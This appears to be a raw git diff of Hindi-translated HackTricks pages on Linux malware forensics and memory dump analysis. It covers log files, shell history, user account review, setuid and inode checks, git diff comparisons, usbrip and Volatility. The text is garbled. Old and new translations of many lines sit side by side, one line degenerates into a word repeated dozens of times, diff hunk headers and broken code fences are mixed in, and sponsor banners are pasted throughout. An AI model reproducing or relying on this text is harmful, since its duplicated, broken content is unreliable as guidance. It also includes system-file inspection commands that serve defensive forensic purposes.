सिस्टम और सुरक्षा लॉग में दर्ज किए गए **लॉगिन** घटनाएं, जिसमें नेटवर्क के माध्यम से लॉगिन, एक निश्चित समय पर किसी खाते के माध्यम से **मैलवेयर** या एक **अतिक्रमणकारी ने पहुंच** प्राप्त किया हो सकता है। एक मैलवेयर संक्रमण के समय के आसपास अन्य घटनाएं सिस्टम लॉग में कैप्चर की जा सकती हैं, जैसे कि एक **नई** **सेवा** का **निर्माण** या घटना के समय नए खातों का निर्माण।\
रोचक सिस्टम लॉगिन:
{% hint style="info" %}
लिनक्स सिस्टम लॉग और ऑडिट सबसिस्टम को एक उत्पीड़न या मालवेयर घटना में अक्षम या हटा दिया जा सकता है। क्योंकि लिनक्स सिस्टम पर लॉग आम तौर पर दुष्ट गतिविधियों के बारे में सबसे उपयोगी जानकारी को समाहित करते हैं, अत्याधिकारियों नियमित रूप से उन्हें हटा देते हैं। इसलिए, उपलब्ध लॉग फ़ाइलों की जांच करते समय, यह महत्वपूर्ण है कि हटाने या छेदखद्द करने के संकेत के रूप में गैप्स या अव्यवस्थित प्रविष्टियों की खोज की जाए।
{% endhint %}
* **/var/log/syslog** (debian) या **/var/log/messages** (Redhat)
* सिस्टम के बारे में सामान्य संदेश और जानकारी दिखाता है। यह वैश्विक सिस्टम के द्वारा किए गए सभी गतिविधियों का डेटा लॉग है।
* **/var/log/auth.log** (debian) या **/var/log/secure** (Redhat)
* सफल या असफल लॉगिन, और प्रमाणीकरण प्रक्रियाओं के लिए प्रमाणीकरण लॉग रखता है। संग्रहण सिस्टम प्रकार पर निर्भर करता है।
* `cat /var/log/auth.log | grep -iE "session opened for|accepted password|new session|not in sudoers"`
* **/var/log/boot.log**: स्टार्टअप संदेश और बूट जानकारी।
* **/var/log/maillog** या **var/log/mail.log:** मेल सर्वर लॉग के लिए है, पोस्टफिक्स, smtpd, या आपके सर्वर पर चल रही ईमेल संबंधित सेवाओं की जानकारी के लिए उपयुक्त है।
* **/var/log/kern.log**: कर्नेल लॉग और चेतावनी जानकारी रखता है। कर्नेल गतिविधि लॉग (जैसे, dmesg, kern.log, klog) दिखा सकते हैं कि किसी विशेष सेवा का बार-बार क्रैश हो रहा है, जिससे संकेत मिल सकता है कि एक अस्थिर ट्रोजनाइज़ वर्जन स्थापित किया गया है।
* **/var/log/dmesg**: डिवाइस ड्राइवर संदेशों के लिए एक भंडारण स्थान। इस फ़ाइल में संदेश देखने के लिए **dmesg** का उपयोग करें।
* **/var/log/faillog:** असफल लॉगिन के बारे में जानकारी रिकॉर्ड करता है। इसलिए, लॉगिन क्रेडेंशियल हैक्स और ब्रूट-फोर्स हमलों जैसे संभावित सुरक्षा उल्लंघनों की जांच के लिए उपयोगी है।
* **/var/log/cron**: Crond संबंधित संदेशों (क्रॉन जॉब्स) का रिकॉर्ड रखता है। जैसे जब क्रॉन डेमन ने एक नौकरी शुरू की।
* **/var/log/daemon.log:** चल रहे पृष्ठ सेवाओं का ट्रैक रखता है लेकिन उन्हें ग्राफिकल रूप में प्रस्तुत नहीं करता है।
* **/var/log/btmp**: सभी असफल लॉगिन प्रयासों का एक नोट रखता है।
* **/var/log/httpd/**: Apache httpd डेमन के error\_log और access\_log फ़ाइलों को रखने वाला एक निर्देशिका। httpd कोई भी त्रुटि जो आती है, उसे **error\_log** फ़ाइल में रखा जाता है। सिस्टम से संबंधित त्रुटियों की तरह। **access\_log** HTTP के माध्यम से आने वाले सभी अनुरोधों का लॉग रखता है।
* **/var/log/mysqld.log** या **/var/log/mysql.log**: MySQL लॉग फ़ाइल जो हर debug, विफलता और सफलता संदेश को रिकॉर्ड करती है, जिसमें MySQL डेमन mysqld की शुरुआत, बंद करना और पुनरारंभ करना शामिल है। सिस्टम निर्धारित करता है। RedHat, CentOS, Fedora, और अन्य RedHat-आधारित सिस्टम /var/log/mariadb/mariadb.log का उपयोग करते हैं। हालांकि, Debian/Ubuntu /var/log/mysql/error.log निर्देशिका का उपयोग करते हैं।
* **/var/log/xferlog**: FTP फ़ाइल स्थानांतरण सत्रों को रखता है। फ़ाइल नामों और उपयोगकर्ता प्रेरित FTP स्थानांतरण जैसी जानकारी शामिल है।
* **/var/log/\*** : इस निर्देशिका में अप्रत्याशित लॉग के लिए हमेशा जांच करना चाहिए
**लिनक्स प्रत्येक उपयोगकर्ता के लिए एक कमांड हिस्ट्री बनाए रखता है**, जिसे इसमें स्टोर किया जाता है:
{% hint style="info"
```
- ~/.bash_history
- ~/.zsh_history
- ~/.zsh_sessions/*
- ~/.python_history
- ~/.*_history
इसके अतिरिक्त, `last -Faiwx` कमांड एक उपयोगकर्ता लॉगिन की सूची प्रदान करता है। अज्ञात या अप्रत्याशित लॉगिन के लिए इसे जांचें।
अतिरिक्त अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिकाधिक अधिक
```bash
pip3 install usbrip
usbrip ids download #Download USB ID database
```
### उदाहरण
```
```bash
usbrip events history #Get USB history of your curent linux machine
usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR user
#Search for vid and/or pid
@ -303,91 +314,85 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
```
अधिक उदाहरण और जानकारी गिटहब में: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और **ऑटोमेट वर्कफ़्लो** बनाने के लिए दुनिया के **सबसे उन्नत** समुदाय उपकरणों द्वारा संचालित करें।\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और **दुनिया के सबसे उन्नत समुदाय उपकरणों** द्वारा संचालित **कार्यप्रवाहों** को आसानी से निर्माण और स्वचालित करें।\
आज ही पहुंचें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## उपयोगकर्ता खातों और लॉगऑन गतिविधियों की समीक्षा
अनूठे नामों या खातों की जांच करें जो अनुमतित घटनाओं के निकट बनाए गए या उपयोग किए गए हों।\
असामान्य नामों या खातों की जांच करें जो अनुमतित घटनाओं के निकट बनाए गए या उपयोग किए गए हों।\
सुदूर विशेषाधिकारों की जांच करें जो उपयोगकर्ताओं को दी गई हों।\
किसी भी खातों की खोज करें जिनमें **कोई पासवर्ड नहीं** है या **आसानी से अनुमान लगाया जा सकने वाला पासवर्ड** है।
असामान्य नामों या खातों की जांच करें जो _**/etc/passwd**_, _**/etc/shadow**_ और **सुरक्षा लॉग** में निर्मित और/या उपयोग किए गए हों जो ज्ञात अनधिकृत घटनाओं के करीब बनाए गए हों। साथ ही, संभावित सुडो ब्रूट-फोर्स हमलों की जांच करें।\
इसके अतिरिक्त, _**/etc/sudoers**_ और _**/etc/groups**_ जैसी फ़ाइलों की जांच करें जिसमें उपयोगकर्ताओं को अप्रत्याशित विशेषाधिकार दिए गए हों।\
अंततः, **कोई पासवर्ड नहीं** या **आसानी से अनुमान लगाए जाने वाले** पासवर्ड वाले खातों की जांच करें।
## फ़ाइल सिस्टम की जांच
फ़ाइल सिस्टम डेटा संरचनाएँ एक **मैलवेयर** घटना से संबंधित बहुत सारी **जानकारी** प्रदान कर सकती हैं, जैसे **घटनाओं का समय** और **मैलवेयर** की वास्तविक **सामग्री**।\
**मैलवेयर** को **फ़ाइल सिस्टम विश्लेषण** को अवरोधित करने के लिए बढ़ाया जा रहा है। कुछ मैलवेयर दुर्भाग्यपूर्ण फ़ाइलों पर दिनांक-समय छापों को बदलते हैं ताकि उन्हें टाइमलाइन विश्लेषण के साथ खोजना कठिन हो। अन्य दुर्भाग्यपूर्ण कोड डेटा को केवल फ़ाइल सिस्टम में रखने के लिए डिज़ाइन किए गए हैं।\
इस प्रकार के एंटी-फोरेंसिक तकनीकों का सामना करने के लिए, फ़ाइल सिस्टम दिनांक-समय छापों के टाइमलाइन विश्लेषण और मैलवेयर के सामान्य स्थानों में संभावित फ़ाइलों की जांच करना आवश्यक है।
### मैलवेयर जांच में फ़ाइल सिस्टम संरचनाओं का विश्लेषण
* **ऑटॉप्सी** का उपयोग करके आप संदेहास्पद गतिविधि खोजने के लिए घटनाओं का टाइमलाइन देख सकते हैं। आप **Sleuth Kit** से `mactime` विशेषता का सीधा उपयोग भी कर सकते हैं।
* **$PATH** में **अप्रत्याशित स्क्रिप्ट** की जांच करें (शायद कुछ sh या php स्क्रिप्ट?)
* `/dev` में फ़ाइलें विशेष फ़ाइलें थीं, आप यहाँ मैलवेयर से संबंधित गैर-विशेष फ़ाइलें पा सकते हैं।
* असामान्य या **छिपी हुई फ़ाइलें** और **निर्देशिकाएँ** खोजें, जैसे “.. ” (डॉट डॉट स्पेस) या “..^G ” (डॉट डॉट कंट्रोल-जी)
* सिस्टम पर /bin/bash की setuid प्रतियां `find / -user root -perm -04000 print`
* बड़ी संख्या में फ़ाइलों के हटाए जाने के लिए हटाए गए **इनोड की दिनांक-समय छापों** की समीक्षा करें, जो एक ही समय पर होने वाली दुर्भाग्यपूर्ण गतिविधि जैसे रूटकिट या ट्रोजनाइज़ सेवा की स्थापना का संकेत दे सकती है।
* क्योंकि इनोड अगली उपलब्धता के आधार पर आवंटित किए जाते हैं, **सिस्टम पर डाली गई दुर्भाग्यपूर्ण फ़ाइलें लगभग एक ही समय पर स्थापित की जा सकती हैं**। इसलिए, जब मैलवेयर का एक घटक पाया जाता है, तो पड़ोसी इनोड की जांच करना उपयोगी हो सकता है।
* नए या संशोधित फ़ाइलों की **संशोधित और या बदली गई समय** की दिनांक-समय छापों की समीक्षा करें जैसे _/bin_ या _/sbin_ जैसे निर्देशिकाओं की।
* एक निर्देशिका की फ़ाइलों और फ़ोल्डर को देखना **निर्माण तिथि** के आधार पर वर्णित होता है बजाय वर्णानुक्रमिक रूप से देखना दिखाई देता है कि कौन सी फ़ाइलें या फ़ोल्डर अधिक हाल की हैं (अंतिम वाले सामान्यतः)।
मैलवेयर घटनाओं की जांच करते समय, फ़ाइल सिस्टम की संरचना एक महत्वपूर्ण सूत्र होती है, जो घटनाओं की क्रमवार्ता और मैलवेयर की सामग्री दोनों की जानकारी प्रकट करती है। हालांकि, मैलवेयर लेखक इस विश्लेषण को बाधित करने के लिए तकनीक विकसित कर रहे हैं, जैसे फ़ाइल टाइमस्टैम्प को संशोधित करना या डेटा भंडारण के लिए फ़ाइल सिस्टम से बचना।
आप `ls -laR --sort=time /bin` का उपयोग करके एक फ़ोल्डर की सबसे हाल की फ़ाइलें देख सकते हैं।\
आप `ls -lai /bin |sort -n` का उपयोग करके एक फ़ोल्डर में फ़ाइलों के इनोड देख सकते हैं।
इन एंटी-फोरेंसिक विधियों का विरोध करने के लिए, निम्नलिखित महत्वपूर्ण है:
- **घटना समयरेखा विश्लेषण** का विस्तृत कार्यक्रम उपयोग करके करें, जैसे कि **Autopsy** जैसे उपकरणों का उपयोग करके घटना समयरेखाओं को दृश्यात्मक बनाने के लिए या **Sleuth Kit's** `mactime` का उपयोग विस्तृत समयरेखा डेटा के लिए।
- तंत्रिका द्वारा उपयोग किए गए अप्रत्याशित स्क्रिप्टों की जांच करें, जो आक्रमणकारियों द्वारा उपयोग किए जा सकते हैं, जैसे कि शैल या PHP स्क्रिप्ट।
- **अटिपिकल फ़ाइलों** के लिए `/dev` की जांच करें, क्योंकि यह पारंपरिक रूप से विशेष फ़ाइलों को समेत रखता है, लेकिन मैलवेयर संबंधित फ़ाइलों को भी रख सकता है।
- ".. " (डॉट डॉट स्पेस) या "..^G" (डॉट डॉट कंट्रोल-जी) जैसे नामों वाली **छिपी हुई फ़ाइलों या निर्देशिकाओं** की खोज करें, जो कट्टर सामग्री को छुपा सकती हैं।
- उच्च अनुमतियों वाली रूट फ़ाइलों की पहचान करें इस आदेश का उपयोग करके:
```find / -user root -perm -04000 -print```
यह उच्च अनुमतियों वाली फ़ाइलों को खोजता है, जिन्हें आक्रमणकारियों द्वारा दुरुपयोग किया जा सकता है।
- इनोड तालिकाओं में **मिटाने की समयचिह्न** की समीक्षा करें, ताकि रूटकिट या ट्रोजन की मौजूदगी की संकेतिकता को पहचान सकें।
- एक के बाद एक आने वाले इनोड की जांच करें, एक बार एक को पहचानने के बाद उनके पास मैलवेयर संबंधित फ़ाइलें हो सकती हैं।
- हाल ही में संशोधित फ़ाइलों के लिए सामान्य बाइनरी निर्देशिकाओं (_/bin_, _/sbin_) की जांच करें, क्योंकि इन्हें मैलवेयर द्वारा संशोधित किया जा सकता है।
```bash
# List recent files in a directory:
ls -laR --sort=time /bin```
# Sort files in a directory by inode:
ls -lai /bin | sort -n```
```
{% hint style="info" %}
ध्यान दें कि एक **हमलावर** **फ़ाइलें दिखाने** के लिए **समय** को **संशोधित** कर सकता है, लेकिन वह **इनोड** को **संशोधित** नहीं कर सकता। यदि आपको लगता है कि एक **फ़ाइल** का **इनोड समय** के रूप में बनाया गया है और उसका **इनोड अप्रत्याशित रूप से बड़ा** है, तो उस **फ़ाइल के टाइमस्टैम्प संशोधित किए गए** हो सकते हैं।
ध्यान दें कि एक **हमलावर** समय को **संशोधित** कर सकता है ताकि **फ़ाइलें वैध** लगें, लेकिन वह **inode** को **संशोधित** नहीं कर सकता। अगर आपको लगता है कि एक **फ़ाइल** इस बात का संकेत देती है कि यह उसी समय बनाई और संशोधित की गई थी जैसे कि उसी फ़ोल्डर में अन्य फ़ाइलें, लेकिन **inode** अपेक्षाकृत बड़ा है, तो उस **फ़ाइल के timestamps को संशोधित किया गया था**
{% endhint %}
## विभिन्न फ़ाइल सिस्टम संस्करणों की फ़ाइलों की तुलना करें
## विभिन्न फ़ाइल सिस्टम संस्करणों की तुलना करें
#### जोड़ी गई फ़ाइलें
### फ़ाइल सिस्टम संस्करण तुलना सारांश
फ़ाइल सिस्टम संस्करणों की तुलना करने और परिवर्तनों को पहचानने के लिए, हम सरलित `git diff` कमांड का उपयोग करते हैं:
- **नई फ़ाइलें खोजने** के लिए, दो निर्देशिकाओं की तुलना करें:
```bash
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/
git diff --no-index --diff-filter=A path/to/old_version/ path/to/new_version/
```
#### संशोधित सामग्री खोजें
- **संशोधित सामग्री के लिए**, विशिष्ट पंक्तियों को नजरअंदाज करते हुए परिवर्तनों की सूची बनाएं:
```bash
git diff --no-index --diff-filter=M _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ | grep -E "^\+" | grep -v "Installed-Time"
git diff --no-index --diff-filter=M path/to/old_version/ path/to/new_version/ | grep -E "^\+" | grep -v "Installed-Time"
```
#### हटाए गए फ़ाइलें खोजें
- **हटाए गए फ़ाइलों का पता लगाने के लिए**:
```bash
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/
git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/
```
#### अन्य फ़िल्टर
**`-diff-filter=[(A|C|D|M|R|T|U|X|B)…​[*]]`**
केवल फ़ाइलों को चुनें जिन्हें जोड़ा गया (`A`), कॉपी किया गया (`C`), हटाया गया (`D`), संशोधित किया गया (`M`), नाम बदला गया (`R`), और उनके प्रकार (जैसे सामान्य फ़ाइल, सिंकलिंक, सबमॉड्यूल, …​) बदल गया (`T`), अमर्जित (`U`), अज्ञात (`X`), या उनके संयोजन टूट गया (`B`). फ़िल्टर वर्णों का कोई भी संयोजन (सहित किसी भी नहीं) उपयोग किया जा सकता है. जब `*` (सभी या कोई नहीं) संयोजन में जोड़ा जाता है, तो तुलना में किसी अन्य मानदंड को मिलने पर सभी पथ चयनित होते हैं; अगर कोई ऐसी फ़ाइल नहीं है जो अन्य मानदंड को मिलती है, तो कुछ भी चयनित नहीं होता है।
इसके अलावा, **ये ऊपरी मामले छोटे अक्षर में बदले जा सकते हैं**। उदाहरण के लिए, `--diff-filter=ad` जोड़े और हटाए गए पथों को निकालता है।
ध्यान दें कि सभी विभेदों में सभी प्रकार शामिल नहीं हो सकते। उदाहरण के लिए, सूची से काम के पेड़ से वर्किंग ट्री की तुलना में विभेद कभी भी जोड़े गए प्रविष्टियों को नहीं रख सकते (क्योंकि विभेद में शामिल पथों का सेट सूची में क्या है उससे सीमित होता है)। उसी तरह, कॉपी और नाम बदले गए प्रविष्टियाँ उस समय प्रकट नहीं हो सकतीं जब उन प्रकारों के लिए पहचान अक्षम हो।
- **फ़िल्टर विकल्प** (`--diff-filter`) मदद करते हैं किसी विशेष परिवर्तन जैसे जोड़ी गई (`A`), हटाई गई (`D`), या संशोधित (`M`) फ़ाइलों तक पहुंचने में।
- `A`: जोड़ी गई फ़ाइलें
- `C`: कॉपी की गई फ़ाइलें
- `D`: हटाई गई फ़ाइलें
- `M`: संशोधित फ़ाइलें
- `R`: नामकरण की गई फ़ाइलें
- `T`: प्रकार के परिवर्तन (उदा।, फ़ाइल से सिंबलिंक)
- `U`: असंघटित फ़ाइलें
- `X`: अज्ञात फ़ाइलें
- `B`: टूटी हुई फ़ाइलें
## संदर्भ
* [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf)
* [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जांच करें!
* अपने [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन की
* प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
**अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details>
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और आसानी से **वर्ल्ड के सबसे उन्नत समुदाय उपकरणों द्वारा संचालित** वर्कफ़्लो बनाएं और स्वचालित करें।\
आज ही पहुंचें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
* [https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203](https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203)
* **पुस्तक: मैलवेयर फोरेंसिक्स फ़ील्ड गाइड फॉर लिनक्स सिस्टम्स: डिजिटल फोरेंसिक्स फ़ील्ड गाइड्स**

View file

@ -2,40 +2,68 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने** की उपलब्धता चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें।
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके अपना योगदान दें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी हैकट्रिक्स में विज्ञापित हो**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud)** में पीआर जमा करके।
</details>
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा इवेंट है और यूरोप में सबसे महत्वपूर्ण में से एक है। तकनीकी ज्ञान को बढ़ावा देने की मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबलता हुआ मिलन स्थल है।
[**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और **यूरोप** में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह सम्मेलन प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है।
{% embed url="https://www.rootedcon.com/" %}
## प्रारंभ
पीकैप में **मैलवेयर** खोजना शुरू करें। [**मैलवेयर विश्लेषण**](../malware-analysis.md) में उल्लिखित **उपकरण** का उपयोग करें।
पीकैप के अंदर **मैलवेयर** खोजना शुरू करें। [**मैलवेयर विश्लेषण**](../malware-analysis.md) में उल्लिखित **उपकरणों** का उपयोग करें।
## [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)
मेमोरी डंप विश्लेषण के लिए प्रीमियर ओपन-सोर्स फ्रेमवर्क है [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)। Volatility एक Python स्क्रिप्ट है जो बाहरी उपकरण (या वीएमवेयर मेमोरी इमेज जो वीएम को रोककर इकट्ठा किया गया है) के साथ इकट्ठा किए गए मेमोरी डंप को पार्स करने के लिए है। तो, मेमोरी डंप फ़ाइल और प्रासंगिक "प्रोफ़ाइल" (जिससे डंप इकट्ठा किया गया था वह ओएस), Volatility डेटा में संरचनाएँ पहचानना शुरू कर सकता है: चल रहे प्रक्रियाएँ, पासवर्ड, आदि। यह भी विभिन्न प्लगइन का उपयोग करके विभिन्न प्रकार के आर्टिफैक्ट निकालने के लिए विस्तारयोग्य है।\
स्रोत: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
**Volatility मेमोरी डंप विश्लेषण के लिए मुख्य ओपन-सोर्स फ्रेमवर्क है**। यह Python टूल बाह्य स्रोतों या VMware VM से डंप का विश्लेषण करता है, जिसमें डंप के ओएस प्रोफ़ाइल के आधार पर प्रक्रियाएँ और पासवर्ड जैसे डेटा की पहचान करता है। यह प्लगइन के साथ विस्तारणयोग्य है, जिससे यह फोरेंसिक जांचों के लिए अत्यधिक विविध है।
**[यहाँ एक चीटशीट पाएं](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)**
## मिनी डंप क्रैश रिपोर्ट
जब डंप छोटा होता है (कुछ KB, शायद कुछ MB) तो यह शायद एक मिनी डंप क्रैश रिपोर्ट होता है और न कि मेमोरी डंप।
जब डंप छोटा होता है (कुछ KB, शायद कुछ MB) तो यह शायद एक मिनी डंप क्रैश रिपोर्ट होता है और न कि एक मेमोरी डंप।
![](<../../../.gitbook/assets/image (216).png>)
यदि आपके पास Visual Studio स्थापित है, तो आप इस फ़ाइल को खोल सकते हैं और कुछ मूलभूत जानकारी जैसे प्रक्रिया का नाम, आर्किटेक्चर, अपवाद जानकारी और मॉड्यूल्स को बाइंड कर सकते हैं:
अगर आपके पास विजुअल स्टूडियो स्थापित है, तो आप इस फ़ाइल को खोल सकते हैं और प्रक्रिया का नाम, वास्तुकला, अपवाद जानकारी और मॉड्यूल जैसी कुछ मूल जानकारी जोड़ सकते हैं:
![](<../../../.gitbook/assets/image (217).png>)
आप अपवाद को भी लोड कर सकते हैं और
* **अपनी हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
आप अपवाद को भी लोड कर सकते हैं और डीकॉम्पाइल की गई निर्देशिकाएँ देख सकते हैं
![](<../../../.gitbook/assets/image (219).png>)
![](<../../../.gitbook/assets/image (218) (1).png>)
वैसे, विजुअल स्टूडियो डंप की गहराई का विश्लेषण करने के लिए सर्वश्रेष्ठ उपकरण नहीं है।
आपको इसे **आईडीए** या **राडारे** का उपयोग करके गहराई में जांचने की चाहिए।
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और **यूरोप** में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह सम्मेलन प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है।
{% embed url="https://www.rootedcon.com/" %}
<details>
